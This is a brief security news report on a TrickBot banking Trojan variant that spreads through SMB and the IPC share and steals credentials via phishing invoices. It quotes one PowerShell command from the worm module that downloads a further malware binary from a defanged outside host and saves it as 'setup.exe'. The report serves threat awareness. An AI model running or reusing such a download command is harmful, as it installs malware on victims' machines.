The new version of credential stealing TrickBot banking Trojan, known as “1000029” (v24), has been found using the Windows Server Message Block (SMB)—that allowed WannaCry and Petya to spread across the world quickly.
The Trojan generally spreads via email attachments impersonating invoices from a large unnamed “international financial institution,” but actually leads victims to a fake login page used to steal credentials.
The Trickbot’s “MachineFinder” and “netscan” functions appear to leverage the following techniques:
• NetServer Enumeration function
• LDAP Enumeration
More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.
The malware appears to leverage the IPC (interprocess communication) share to propagate and execute a PowerShell script as a final payload to download another Trickbot malware, masked as “setup[.]exe,” into the shared drive.
The following PowerShell script was observed in the worm module:
powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”
In order to safeguard against such malware infection, you should always be suspicious of unwanted files and documents sent over an email and should never click on links inside them unless verifying the source and also make sure that you run an effective anti-virus security suite on your system, and keep it up-to-date